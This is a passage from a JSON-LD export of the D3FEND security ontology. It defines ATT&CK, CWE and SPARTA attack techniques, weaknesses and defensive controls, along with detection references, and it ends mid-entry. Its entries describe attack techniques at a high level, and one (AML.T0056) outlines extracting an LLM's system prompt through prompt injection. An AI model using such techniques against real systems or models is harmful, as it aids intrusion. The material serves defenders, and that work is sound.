      "d3f:definition": "Adversaries may rely on a user installing a malicious library to facilitate execution. Threat actors may [Upload Malware](https://attack.mitre.org/techniques/T1608/001) to package managers such as NPM and PyPi, as well as to public code repositories such as GitHub. User may install libraries without realizing they are malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that establishes persistence, steals data, or mines cryptocurrency.(Citation: Datadog Security Labs Malicious PyPi Packages 2024)(Citation: Fortinet Malicious NPM Packages 2023)",
      "rdfs:label": "Malicious Library",
      "rdfs:subClassOf": {
        "@id": "d3f:T1204"
      }
    },
    {
      "@id": "d3f:CWE-164",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-164",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes internal special elements that could be interpreted in unexpected ways when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Internal Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodsThereofForIdentificationOfSuspiciousSystemProcesses_PaloAltoNetworksInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170286683A1/en?oq=US-2017286683-A1"
      },
      "d3f:kb-abstract": "A computerized method for identification of suspicious processes executing on an end-point device communicatively connected to network, the network communicatively connected to a server, the method comprising receiving, by the server, a record of at least one process, initiated by and executing on by the end-point device. One or more parameters associated with the at least one process are identified. A first time pointer is identified corresponding to the identified one or more parameters, a first time pointer. A second time pointer at which a user associated with the end-point device initiated a user dependent process is identified. Whether the second time pointer occurred before the first time pointer is identified. It is determined whether the at least one process was initiated by the user based on identification of user dependent processes and corresponding attribution. An action is performed based on the above determination.",
      "d3f:kb-author": "Gil BARAK",
      "d3f:kb-mitre-analysis": "The patent describes detecting malicious processes by identifying the order of process initiation. The start of a user initiated process (user query, opening an application, etc.) is compared with the start of processes initiated by the device (ex. during boot). In addition, a determination is made on whether processes are not initiated by a user by examining process parameters such as type of process, its creator, source, etc. If it is determined that a user initiated process was started before a process initiated by the device and a process was not initiated by the user, the process is marked as suspicious.",
      "d3f:kb-organization": "Palo Alto Networks Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "System and methods thereof for identification of suspicious system processes",
      "rdfs:label": "Reference - System and methods thereof for identification of suspicious system processes - Palo Alto Networks Inc"
    },
    {
      "@id": "d3f:CWE-437",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-437",
      "d3f:definition": "A product acts as an intermediary or monitor between two or more endpoints, but it does not have a complete model of an endpoint's features, behaviors, or state, potentially causing the product to perform incorrect actions based on this incomplete model.",
      "rdfs:label": "Incomplete Model of Endpoint Features",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-436"
      }
    },
    {
      "@id": "d3f:Reference-DaggerModelingAndVisualizationForMissionImpactSituationalAwareness",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://ieeexplore.ieee.org/document/7795296"
      },
      "d3f:kb-abstract": "Dagger is a modeling and visualization framework that addresses the challenge of representing knowledge and information for decision-makers, enabling them to better comprehend the operational context of network security data. It allows users to answer critical questions such as “Given that I care about mission X, is there any reason I should be worried about what is going on in cyberspace?” or “If this system fails, will I still be able to accomplish my mission?”.",
      "d3f:kb-author": "Elisha Peterson",
      "d3f:kb-organization": "JHU APL",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperationalDependencyMapping"
      },
      "d3f:kb-reference-title": "Dagger: Modeling and visualization for mission impact situational awareness",
      "rdfs:label": "Reference - Dagger: Modeling and visualization for mission impact situational awareness"
    },
    {
      "@id": "d3f:TA0103",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Evasion - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Evasion"
    },
    {
      "@id": "d3f:CWE-353",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-353",
      "d3f:definition": "The product uses a transmission protocol that does not include a mechanism for verifying the integrity of the data during transmission, such as a checksum.",
      "rdfs:label": "Missing Support for Integrity Check",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:PrivilegedUserAccount",
      "@type": "owl:Class",
      "d3f:definition": "A privileged account is a user account that has more privileges than ordinary users. Privileged accounts might, for example, be able to install or remove software, upgrade the operating system, or modify system or application configurations. They might also have access to files that are not normally accessible to standard users. Typical examples are root and administrator accounts. But there also service accounts, system accounts, etc. Privileged accounts are especially powerful, and should be monitored especially closely.",
      "rdfs:isDefinedBy": {
        "@id": "https://www.ssh.com/iam/user/privileged-account"
      },
      "rdfs:label": "Privileged User Account",
      "rdfs:seeAlso": {
        "@id": "https://www.cyberark.com/resources/blog/7-types-of-privileged-accounts-service-accounts-and-more"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:CWE-179",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-179",
      "d3f:definition": "The product validates input before applying protection mechanisms that modify the input, which could allow an attacker to bypass the validation via dangerous inputs that only arise after the modification.",
      "rdfs:label": "Incorrect Behavior Order: Early Validation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-20"
        },
        {
          "@id": "d3f:CWE-696"
        }
      ]
    },
    {
      "@id": "d3f:Reference-CAR-2020-09-001%3AScheduledTask-FileAccess_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-09-001/"
      },
      "d3f:kb-abstract": "In order to gain persistence, privilege escalation, or remote execution, an adversary may use the Windows Task Scheduler to schedule a command to be run at a specified time, date, and even host. Task Scheduler stores tasks as files in two locations - C:\\Windows\\Tasks (legacy) or C:\\Windows\\System32\\Tasks. Accordingly, this analytic looks for the creation of task files in these two locations.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileCreationAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-09-001: Scheduled Task - FileAccess",
      "rdfs:label": "Reference - CAR-2020-09-001: Scheduled Task - FileAccess - MITRE"
    },
    {
      "@id": "d3f:BinaryClassification",
      "@type": "owl:Class",
      "rdfs:label": "Binary Classification",
      "rdfs:subClassOf": {
        "@id": "d3f:Classifying"
      }
    },
    {
      "@id": "d3f:CCI-002771_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system validates information output from organization-defined software programs and/or applications to ensure that the information is consistent with the expected content.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:OutboundTrafficFiltering"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002771"
    },
    {
      "@id": "d3f:AdministrativeNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Administrative network traffic is network traffic related to the remote administration or control of hosts or devices through a standard remote administrative protocol.  Remote shells, terminals, RDP, and VNC are examples of these protocols, which are typically only used by administrators.",
      "rdfs:label": "Administrative Network Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Remote_administration"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:RD-0005.02",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0005.02",
      "d3f:definition": "Non-kinetic physical ASATs damage or degrade without contact, typically via directed energy or intense electromagnetic effects. Ground- or space-based lasers can dazzle or blind optical sensors; high-power microwave or related electromagnetic systems can disrupt or permanently damage susceptible electronics; some concepts aim to generate broader electromagnetic effects. These attacks propagate at light speed, can be tuned for reversible or lasting impact, and may leave limited forensic residue, complicating verification and attribution. Actors who obtain or partner for such systems can pair them with cyber operations (e.g., blind a star tracker while injecting misleading commands) to amplify effect.",
      "rdfs:label": "Non-Kinetic Physical ASAT - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0005/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0005"
      },
      "skos:prefLabel": "Non-Kinetic Physical ASAT"
    },
    {
      "@id": "d3f:Reference-CarvingContiguousandFragmentedFilesWithFastObjectValidation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.sciencedirect.com/science/article/pii/S1742287607000369?viewFullText=true#sec4"
      },
      "d3f:kb-abstract": "“File carving” reconstructs files based on their content, rather than using metadata that points to the content. Carving is widely used for forensics and data recovery, but no file carvers can automatically reassemble fragmented files. We survey files from more than 300 hard drives acquired on the secondary market and show that the ability to reassemble fragmented files is an important requirement for forensic work. Next we analyze the file carving problem, arguing that rapid, accurate carving is best performed by a multi-tier decision problem that seeks to quickly validate or discard candidate byte strings – “objects” – from the media to be carved. Validators for the JPEG, Microsoft OLE (MSOLE) and ZIP file formats are discussed. Finally, we show how high speed validators can be used to reassemble fragmented files.",
      "d3f:kb-author": "Simson L. Garfinkel",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:FileContentDecompressionChecking"
        },
        {
          "@id": "d3f:FileInternalStructureVerification"
        },
        {
          "@id": "d3f:FileMagicByteVerification"
        },
        {
          "@id": "d3f:FileMetadataValueVerification"
        }
      ],
      "d3f:kb-reference-title": "Carving Contiguous and Fragmented Files with Fast Object Validation",
      "rdfs:label": "Reference - Carving Contiguous and Fragmented Files with Fast Object Validation"
    },
    {
      "@id": "d3f:SoftwareTimerEvent",
      "@type": "owl:Class",
      "d3f:definition": "A clock event involving a software-based timekeeping mechanism maintained by an operating system or application.",
      "rdfs:label": "Software Timer Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:TimerEvent"
        },
        {
          "@id": "_:N1450ed4905f54ce0b583fb62649332a4"
        }
      ]
    },
    {
      "@id": "_:N1450ed4905f54ce0b583fb62649332a4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SoftwareTimer"
      }
    },
    {
      "@id": "d3f:T1550.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1550.003",
      "d3f:creates": {
        "@id": "d3f:Authentication"
      },
      "d3f:definition": "Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.",
      "rdfs:label": "Pass the Ticket",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1550"
        },
        {
          "@id": "_:N74b500fa6b9443be8b7ffbaa2caa468a"
        }
      ]
    },
    {
      "@id": "_:N74b500fa6b9443be8b7ffbaa2caa468a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "d3f:AML.T0056",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0056",
      "d3f:definition": "Adversaries may attempt to extract a large language model's (LLM) system prompt. This can be done via prompt injection to induce the model to reveal its own system prompt or may be extracted from a configuration file.\n\nSystem prompts can be a portion of an AI provider's competitive advantage and are thus valuable intellectual property that may be targeted by adversaries.",
      "rdfs:label": "Extract LLM System Prompt - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0056"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASExfiltrationTechnique"
      },
      "skos:prefLabel": "Extract LLM System Prompt"
    },
    {
      "@id": "d3f:executed-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x executed-by y: The entity or function x is carried out, performed, or run by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:executes"
      },
      "rdfs:label": "executed-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:KerberosTicketGrantingTicket",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A ticket granting ticket issued by a Kerberos system; that is, a ticket that grants a user domain admin access.",
      "rdfs:label": "Kerberos Ticket Granting Ticket",
      "rdfs:seeAlso": {
        "@id": "dbr:Ticket_Granting_Ticket"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:KerberosTicket"
        },
        {
          "@id": "d3f:TicketGrantingTicket"
        }
      ]
    },
    {
      "@id": "d3f:T1600.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1600.001",
      "d3f:definition": "Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)",
      "rdfs:label": "Reduce Key Space",
      "rdfs:subClassOf": {
        "@id": "d3f:T1600"
      }
    },
    {
      "@id": "d3f:CCI-001499_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization limits privileges to change software resident within software libraries.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:SystemConfigurationPermissions"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-29T00:00:00"
      },
      "rdfs:label": "CCI-001499"
    },
    {
      "@id": "d3f:CWE-1104",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1104",
      "d3f:definition": "The product relies on third-party components that are not actively supported or maintained by the original developer or a trusted proxy for the original developer.",
      "rdfs:label": "Use of Unmaintained Third Party Components",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1357"
      }
    },
    {
      "@id": "d3f:StringFormatFunction",
      "@type": "owl:Class",
      "d3f:definition": "A function which creates a new string based on a format specification and correspondingi specified values.",
      "rdfs:label": "String Format Function",
      "rdfs:subClassOf": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:CWE-67",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-67",
      "d3f:definition": "The product constructs pathnames from user input, but it does not handle or incorrectly handles a pathname containing a Windows device name such as AUX or CON. This typically leads to denial of service or an information exposure when the application attempts to process the pathname as a regular file.",
      "rdfs:label": "Improper Handling of Windows Device Names",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-66"
      }
    },
    {
      "@id": "d3f:OTProprietaryMessageEvent",
      "@type": "owl:Class",
      "d3f:definition": "Vendor specific and may not be publicly documented, or values left for device specific configuration.",
      "rdfs:label": "OT Proprietary Message Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTEvent"
        },
        {
          "@id": "_:N4d7c9e123d58436c974f95318f80afcf"
        }
      ]
    },
    {
      "@id": "_:N4d7c9e123d58436c974f95318f80afcf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProprietaryMessage"
      }
    },
    {
      "@id": "d3f:OTLogicVariable",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A variable which directly affects a program running on an OT controller, involving an OT Process.",
      "rdfs:label": "OT Logic Variable",
      "rdfs:subClassOf": {
        "@id": "d3f:RuntimeVariable"
      }
    },
    {
      "@id": "d3f:REC-0004.01",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0004.01",
      "d3f:definition": "Threat actors may attempt to learn how the launch vehicle’s flight termination capability is architected and governed, command-destruct versus autonomous flight termination (AFTS), authority chains, cryptographic protections, arming interlocks, inhibit ladders, telemetry indicators, and range rules for safe-flight criteria. While FTS is a range safety function, its interfaces (command links, keys, timing sources, decision logic) can reveal design patterns, dependencies, and potential misconfigurations across the broader launch ecosystem. Knowledge of test modes, simulation harnesses, and pre-launch checks could inform social-engineering or availability-degrading actions against range or contractor systems during critical windows.",
      "rdfs:label": "Flight Termination - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0004/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0004"
      },
      "skos:prefLabel": "Flight Termination"
    },
    {
      "@id": "d3f:T1557.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1557.004",
      "d3f:definition": "Adversaries may host seemingly genuine Wi-Fi access points to deceive users into connecting to malicious networks as a way of supporting follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia ‘Evil Twin’)",
      "rdfs:label": "Evil Twin",
      "rdfs:subClassOf": {
        "@id": "d3f:T1557"
      }
    },
    {
      "@id": "d3f:CWE-664",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-664",
      "d3f:definition": "The product does not maintain or incorrectly maintains control over a resource throughout its lifetime of creation, use, and release.",
      "rdfs:label": "Improper Control of a Resource Through its Lifetime",
      "rdfs:subClassOf": {
        "@id": "d3f:Weakness"
      }
    },
    {
      "@id": "d3f:CWE-606",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-606",
      "d3f:definition": "The product does not properly check inputs that are used for loop conditions, potentially leading to a denial of service or other consequences because of excessive looping.",
      "rdfs:label": "Unchecked Input for Loop Condition",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1284"
      }
    },
    {
      "@id": "d3f:REC-0002.02",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0002.02",
      "d3f:definition": "Threat actors map the human and institutional terrain surrounding the mission to find leverage for phishing, credential theft, invoice fraud, or supply-chain compromise. Targeted details include the owner/operator, prime and subcontractors (bus, payload, ground, launch), key facilities and labs, cloud/SaaS providers, organizational charts, distribution lists, and role/responsibility boundaries for operations, security, and engineering.  The objective is to identify who can approve access, who can move money, who holds admin roles on ground and cloud systems, and which vendors maintain remote access for support. Understanding decision chains also reveals when changes control boards meet, when ops handovers occur, and where a single compromised account could bridge enclaves.",
      "rdfs:label": "Organization - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0002/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0002"
      },
      "skos:prefLabel": "Organization"
    },
    {
      "@id": "d3f:T1600",
      "@type": "owl:Class",
      "d3f:attack-id": "T1600",
      "d3f:definition": "Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)",
      "rdfs:label": "Weaken Encryption",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:CWE-117",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-117",
      "d3f:definition": "The product constructs a log message from external input, but it does not neutralize or incorrectly neutralizes special elements when the message is written to a log file.",
      "d3f:synonym": "Log forging",
      "rdfs:label": "Improper Output Neutralization for Logs",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-116"
      }
    },
    {
      "@id": "d3f:T1205",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1205",
      "d3f:definition": "Adversaries use traffic signaling techniques, such as sending specific network sequences or magic packets, to covertly trigger actions like opening ports, activating backdoors, or installing filters, facilitating command and control, persistence, and defense evasion.",
      "d3f:produces": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Traffic Signaling",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "_:N8c6c7f0a941c4e1a8262e0f73017e7f3"
        }
      ]
    },
    {
      "@id": "_:N8c6c7f0a941c4e1a8262e0f73017e7f3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-765",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-765",
      "d3f:definition": "The product unlocks a critical resource more times than intended, leading to an unexpected state in the system.",
      "rdfs:label": "Multiple Unlocks of a Critical Resource",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-667"
        },
        {
          "@id": "d3f:CWE-675"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1116",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1116",
      "d3f:definition": "The source code contains comments that do not accurately describe or explain aspects of the portion of the code with which the comment is associated.",
      "rdfs:label": "Inaccurate Comments",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:T1121",
      "@type": "owl:Class",
      "d3f:attack-id": "T1121",
      "d3f:definition": "Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1218.009",
      "rdfs:label": "Regsvcs/Regasm",
      "rdfs:seeAlso": {
        "@id": "d3f:T1218.009"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CCI-002726_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:TPMBootIntegrity"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system verifies the integrity of the boot process of organization-defined devices.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002726"
    },
    {
      "@id": "d3f:DecoyEnvironment",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DecoyEnvironment"
      ],
      "d3f:d3fend-id": "D3-DE",
      "d3f:definition": "A Decoy Environment comprises hosts and networks for the purposes of deceiving an attacker.",
      "d3f:enables": {
        "@id": "d3f:Deceive"
      },
      "d3f:kb-article": "## Technique Overview\n\nSystems in a decoy environment are typically configured so that some detectable means of communication does not have any legitimate business purpose.  Any communication via these means should be logged and analyzed to find potential indicators of compromise for a possible past or future attack against other systems.",
      "d3f:manages": {
        "@id": "d3f:DecoyArtifact"
      },
      "d3f:synonym": "Honeypot",
      "rdfs:label": "Decoy Environment",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N0c55f8f6e2c546e19037e85fc7ca6138"
        },
        {
          "@id": "_:N5665f3ecb7a9417abe0875fd5f99d2b5"
        }
      ]
    },
    {
      "@id": "_:N0c55f8f6e2c546e19037e85fc7ca6138",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Deceive"
      }
    },
    {
      "@id": "_:N5665f3ecb7a9417abe0875fd5f99d2b5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DecoyArtifact"
      }
    },
    {
      "@id": "d3f:T1594",
      "@type": "owl:Class",
      "d3f:attack-id": "T1594",
      "d3f:definition": "Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)",
      "rdfs:label": "Search Victim-Owned Websites",
      "rdfs:subClassOf": {
        "@id": "d3f:ReconnaissanceTechnique"
      }
    },
    {
      "@id": "d3f:LinuxFork",
      "@type": "owl:Class",
      "d3f:definition": "Creates a child process with unique PID but retains parent PID as Parent Process Identifier (PPID).",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/fork.2.html"
      },
      "rdfs:label": "Linux Fork",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateProcess"
      }
    },
    {
      "@id": "d3f:CWE-1269",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1269",
      "d3f:definition": "The product released to market is released in pre-production or manufacturing configuration.",
      "rdfs:label": "Product Released in Non-Release Configuration",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:CWE-191",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-191",
      "d3f:definition": "The product subtracts one value from another, such that the result is less than the minimum allowable integer value, which produces a value that is not equal to the correct result.",
      "d3f:synonym": "Integer underflow",
      "rdfs:label": "Integer Underflow (Wrap or Wraparound)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-682"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Embedded Data Types",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(5)"
    },
    {
      "@id": "d3f:CWE-704",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-704",
      "d3f:definition": "The product does not correctly convert an object, resource, or structure from one type to a different type.",
      "rdfs:label": "Incorrect Type Conversion or Cast",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:CWE-497",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-497",
      "d3f:definition": "The product does not properly prevent sensitive system-level information from being accessed by unauthorized actors who do not have the same level of access to the underlying system as the product does.",
      "rdfs:label": "Exposure of Sensitive System Information to an Unauthorized Control Sphere",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-200"
      }
    },
    {
      "@id": "d3f:T1518.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1518.001",
      "d3f:definition": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as cloud monitoring agents and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
      "d3f:may-access": [
        {
          "@id": "d3f:FileSystemMetadata"
        },
        {
          "@id": "d3f:KernelProcessTable"
        },
        {
          "@id": "d3f:SystemConfigurationDatabaseRecord"
        },
        {
          "@id": "d3f:SystemFirewallConfiguration"
        }
      ],
      "d3f:may-invoke": {
        "@id": "d3f:GetRunningProcesses"
      },
      "rdfs:label": "Security Software Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1518"
        },
        {
          "@id": "_:N3322fdf74338446fb651526c82f890e8"
        },
        {
          "@id": "_:Nafad5fdacef649729163b64d7e291063"
        },
        {
          "@id": "_:Nd595d42c34494332ae6c4acbcff10a76"
        },
        {
          "@id": "_:N39e6b4c61fc843d0a9a61d5ede7890f3"
        },
        {
          "@id": "_:N84f8dbcaca604024ae3b8ef4e7fa6b8f"
        }
      ]
    },
    {
      "@id": "_:N3322fdf74338446fb651526c82f890e8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystemMetadata"
      }
    },
    {
      "@id": "_:Nafad5fdacef649729163b64d7e291063",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelProcessTable"
      }
    },
    {
      "@id": "_:Nd595d42c34494332ae6c4acbcff10a76",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "_:N39e6b4c61fc843d0a9a61d5ede7890f3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemFirewallConfiguration"
      }
    },
    {
      "@id": "_:N84f8dbcaca604024ae3b8ef4e7fa6b8f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetRunningProcesses"
      }
    },
    {
      "@id": "d3f:T1001.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1001.003",
